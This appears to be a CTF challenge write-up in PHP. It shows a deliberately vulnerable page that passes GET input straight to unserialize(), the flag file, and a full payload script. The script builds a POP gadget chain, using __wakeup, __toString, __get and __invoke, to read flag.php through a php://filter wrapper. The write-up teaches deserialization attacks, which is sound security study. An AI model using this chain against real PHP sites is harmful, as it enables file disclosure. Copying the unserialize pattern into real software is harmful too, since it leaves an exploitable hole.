题目:
index.php You are in my range!
<?php
error_reporting(0);
class Vox{
protected $headset;
public $sound;
public function fun($pulse){
include($pulse);
}
public function __invoke(){
$this->fun($this->headset);
}
}
class Saw{
public $fearless;
public $gun;
public function __construct($file='index.php'){
$this->fearless = $file;
echo $this->fearless . ' You are in my range!'."<br>";
}
public function __toString(){
$this->gun['gun']->fearless;
return "Saw";
}
public function _pain(){
if($this->fearless){
highlight_file($this->fearless);
}
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|php|\.\./i", $this->fearless)){
echo "Does it hurt? That's right";
$this->fearless = "index.php";
}
}
}
class Petal{
public $seed;
public function __construct(){
$this->seed = array();
}
public function __get($sun){
$Nourishment = $this->seed;
return $Nourishment();
}
}
if(isset($_GET['ozo'])){
unserialize($_GET['ozo']);
}
else{
$Saw = new Saw('index.php');
$Saw->_pain();
}
?>
<?php
!defined('IN_FLAG') && exit('Access Denied');
echo "flag{un3eri@liz3_i3_s0_fun}";
?>
PAYLOAD:
<?php
class Vox{
protected $headset='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Saw{
public $fearless;
public $gun;
public function __construct($file='index.php'){
$this->fearless = $file;
echo $this->fearless . ' You are in my range!'."<br>";
}
public function __toString(){
return "";
}
public function __wakeup()
{
$this->fearless = new Saw();
}
}
class Petal{
public $seed;
public function __construct(){
$this->seed = New Vox();
}
}
$a = new Saw('flag.php');
$a->gun['gun'] = new Petal();
$b = new Saw($a);
$pop = serialize($b);
print_r($pop);
echo "</br>";
echo urlencode($pop);
?>